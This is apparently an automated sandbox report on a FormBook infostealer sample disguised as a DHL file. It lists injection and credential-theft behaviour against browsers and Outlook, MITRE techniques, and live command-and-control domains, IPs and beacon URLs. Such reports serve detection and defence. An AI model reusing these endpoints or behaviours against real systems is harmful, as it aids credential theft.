            Source: MPhqOtiHUlL.exe, 00000003.00000000.2144852254.0000000000F81000.00000002.00000001.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000003.00000002.4524222948.0000000000F81000.00000002.00000001.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524417766.0000000001181000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: DHL 0737-12182024.exe, MPhqOtiHUlL.exe, 00000003.00000000.2144852254.0000000000F81000.00000002.00000001.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000003.00000002.4524222948.0000000000F81000.00000002.00000001.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524417766.0000000001181000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: MPhqOtiHUlL.exe, 00000003.00000000.2144852254.0000000000F81000.00000002.00000001.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000003.00000002.4524222948.0000000000F81000.00000002.00000001.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524417766.0000000001181000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: MPhqOtiHUlL.exe, 00000003.00000000.2144852254.0000000000F81000.00000002.00000001.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000003.00000002.4524222948.0000000000F81000.00000002.00000001.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524417766.0000000001181000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_00840698 cpuid 0_2_00840698
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_00898195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00898195
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0087D27A GetUserNameW,0_2_0087D27A
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0085B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_0085B952
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_008242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008242DE
            Source: DHL 0737-12182024.exe, 00000000.00000002.2075973044.0000000000C17000.00000004.00000020.00020000.00000000.sdmp, DHL 0737-12182024.exe, 00000000.00000003.2051299371.0000000000C17000.00000004.00000020.00020000.00000000.sdmp, DHL 0737-12182024.exe, 00000000.00000003.2051183817.0000000000BA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msmpeng.exe
            Source: DHL 0737-12182024.exe, 00000000.00000002.2075973044.0000000000C17000.00000004.00000020.00020000.00000000.sdmp, DHL 0737-12182024.exe, 00000000.00000003.2051299371.0000000000C17000.00000004.00000020.00020000.00000000.sdmp, DHL 0737-12182024.exe, 00000000.00000003.2051183817.0000000000BA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcupdate.exe

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4523238196.0000000002C10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4524618858.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2226323346.0000000003710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4526783594.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2225605698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4524568253.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4524627388.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2227031882.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: DHL 0737-12182024.exeBinary or memory string: WIN_81
            Source: DHL 0737-12182024.exeBinary or memory string: WIN_XP
            Source: DHL 0737-12182024.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: DHL 0737-12182024.exeBinary or memory string: WIN_XPe
            Source: DHL 0737-12182024.exeBinary or memory string: WIN_VISTA
            Source: DHL 0737-12182024.exeBinary or memory string: WIN_7
            Source: DHL 0737-12182024.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4523238196.0000000002C10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4524618858.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2226323346.0000000003710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4526783594.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2225605698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4524568253.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4524627388.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2227031882.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_008A1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_008A1204
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_008A1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_008A1806

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		1
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		2
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets251
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials12
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578024 Sample: DHL 0737-12182024.exe Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 28 www.joyesi.xyz 2->28 30 www.shenzhoucui.com 2->30 32 18 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 50 7 other signatures 2->50 10 DHL 0737-12182024.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 MPhqOtiHUlL.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netbtugc.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 MPhqOtiHUlL.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.rssnewscast.com 91.195.240.94, 49985, 49986, 49987 SEDO-ASDE Germany 22->34 36 elettrosistemista.zip 195.110.124.133, 49993, 49994, 49995 REGISTER-ASIT Italy 22->36 38 5 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            DHL 0737-12182024.exe58%ReversingLabsWin32.Trojan.AutoitInject
            DHL 0737-12182024.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.goldenjade-travel.com/fo8o/?sLRH=86fTArmPbL&UT5tTdKX=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==100%Avira URL Cloudmalware
            https://www.empowermedeco.com/fo8o/?UT5tTdKX=mxnR0%Avira URL Cloudsafe
            http://www.empowermedeco.com/fo8o/?UT5tTdKX=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&sLRH=86fTArmPbL0%Avira URL Cloudsafe
            http://www.3xfootball.com/fo8o/?sLRH=86fTArmPbL&UT5tTdKX=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g==0%Avira URL Cloudsafe
            http://www.magmadokum.com/fo8o/?sLRH=86fTArmPbL&UT5tTdKX=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA==0%Avira URL Cloudsafe
            http://www.elettrosistemista.zip/fo8o/?sLRH=86fTArmPbL&UT5tTdKX=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==100%Avira URL Cloudmalware
            http://www.rssnewscast.com/fo8o/?UT5tTdKX=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&sLRH=86fTArmPbL100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            elettrosistemista.zip
            		195.110.124.133
            		truefalse
              		high
              empowermedeco.com
              		217.196.55.202
              		truefalse
                		high
                www.3xfootball.com
                		154.215.72.110
                		truefalse
                  		high
                  www.goldenjade-travel.com
                  		116.50.37.244
                  		truefalse
                    		high
                    www.rssnewscast.com
                    		91.195.240.94
                    		truefalse
                      		high
                      www.techchains.info
                      		66.29.149.46
                      		truefalse
                        		high
                        natroredirect.natrocdn.com
                        		85.159.66.93
                        		truefalse
                          		high
                          www.magmadokum.com
                          		unknown
                          		unknownfalse
                            		high
                            www.donnavariedades.com
                            		unknown
                            		unknownfalse
                              		high
                              www.660danm.top
                              		unknown
                              		unknownfalse
                                		high
                                www.joyesi.xyz
                                		unknown
                                		unknownfalse
                                  		high
                                  www.liangyuen528.com
                                  		unknown
                                  		unknownfalse
                                    		high
                                    www.kasegitai.tokyo
                                    		unknown
                                    		unknownfalse
                                      		high
                                      www.empowermedeco.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        www.k9vyp11no3.cfd
                                        		unknown
                                        		unknownfalse
                                          		high
                                          www.elettrosistemista.zip
                                          		unknown
                                          		unknownfalse
                                            		high
                                            www.shenzhoucui.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.antonio-vivaldi.mobi
                                              		unknown
                                              		unknownfalse
                                                		high
                                                www.b301.space
                                                		unknown
                                                		unknowntrue
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.empowermedeco.com/fo8o/false
                                                    		high
                                                    http://www.magmadokum.com/fo8o/?sLRH=86fTArmPbL&UT5tTdKX=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA==true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.goldenjade-travel.com/fo8o/?sLRH=86fTArmPbL&UT5tTdKX=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==true
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.empowermedeco.com/fo8o/?UT5tTdKX=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&sLRH=86fTArmPbLtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.rssnewscast.com/fo8o/?UT5tTdKX=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&sLRH=86fTArmPbLtrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.elettrosistemista.zip/fo8o/false
                                                      		high
                                                      http://www.3xfootball.com/fo8o/?sLRH=86fTArmPbL&UT5tTdKX=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g==true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.magmadokum.com/fo8o/false
                                                        		high
                                                        http://www.rssnewscast.com/fo8o/false
                                                          		high
                                                          http://www.elettrosistemista.zip/fo8o/?sLRH=86fTArmPbL&UT5tTdKX=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.goldenjade-travel.com/fo8o/false
                                                            		high
                                                            http://www.techchains.info/fo8o/false
                                                              		high

                                                              URLs from Memory and Binaries

                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              https://duckduckgo.com/chrome_newtabnetbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://duckduckgo.com/ac/?q=netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.iconetbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.empowermedeco.comMPhqOtiHUlL.exe, 00000006.00000002.4526783594.0000000004F20000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.ecosia.org/newtab/netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.empowermedeco.com/fo8o/?UT5tTdKX=mxnRnetbtugc.exe, 00000004.00000002.4525505296.000000000501A000.00000004.10000000.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524926192.0000000003F9A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_netbtugc.exe, 00000004.00000002.4527522560.0000000006510000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4525505296.00000000046AE000.00000004.10000000.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524926192.000000000362E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.sedo.com/services/parking.php3MPhqOtiHUlL.exe, 00000006.00000002.4524926192.000000000362E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://codepen.io/uzcho_/pens/popular/?grid_type=listnetbtugc.exe, 00000004.00000002.4525505296.00000000049D2000.00000004.10000000.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524926192.0000000003952000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://codepen.io/uzcho_/pen/eYdmdXw.cssnetbtugc.exe, 00000004.00000002.4525505296.00000000049D2000.00000004.10000000.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524926192.0000000003952000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          91.195.240.94
                                                                                          		www.rssnewscast.comGermany
                                                                                          		47846SEDO-ASDEfalse
                                                                                          154.215.72.110
                                                                                          		www.3xfootball.comSeychelles
                                                                                          		132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
                                                                                          195.110.124.133
                                                                                          		elettrosistemista.zipItaly
                                                                                          		39729REGISTER-ASITfalse
                                                                                          116.50.37.244
                                                                                          		www.goldenjade-travel.comTaiwan; Republic of China (ROC)
                                                                                          		18046DONGFONG-TWDongFongTechnologyCoLtdTWfalse
                                                                                          85.159.66.93
                                                                                          		natroredirect.natrocdn.comTurkey
                                                                                          		34619CIZGITRfalse
                                                                                          66.29.149.46
                                                                                          		www.techchains.infoUnited States
                                                                                          		19538ADVANTAGECOMUSfalse
                                                                                          217.196.55.202
                                                                                          		empowermedeco.comNorway
                                                                                          		29300AS-DIRECTCONNECTNOfalse

                                                                                          General Information

                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1578024
                                                                                          Start date and time:2024-12-19 07:49:08 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 10m 41s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:7
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:2
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:DHL 0737-12182024.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.evad.winEXE@7/3@18/7
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 66.7%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 85%
                                                                                          • Number of executed functions: 43
                                                                                          • Number of non-executed functions: 302
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          • VT rate limit hit for: DHL 0737-12182024.exe

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          01:50:55API Interceptor10898023x Sleep call for process: netbtugc.exe modified

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          91.195.240.94DHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.rssnewscast.com/fo8o/
                                                                                          236236236.elfGet hashmaliciousUnknownBrowse
                                                                                          • suboyule.736t.com/
                                                                                          DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.rssnewscast.com/fo8o/
                                                                                          DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.rssnewscast.com/fo8o/
                                                                                          CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.rssnewscast.com/fo8o/
                                                                                          Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.rssnewscast.com/fo8o/
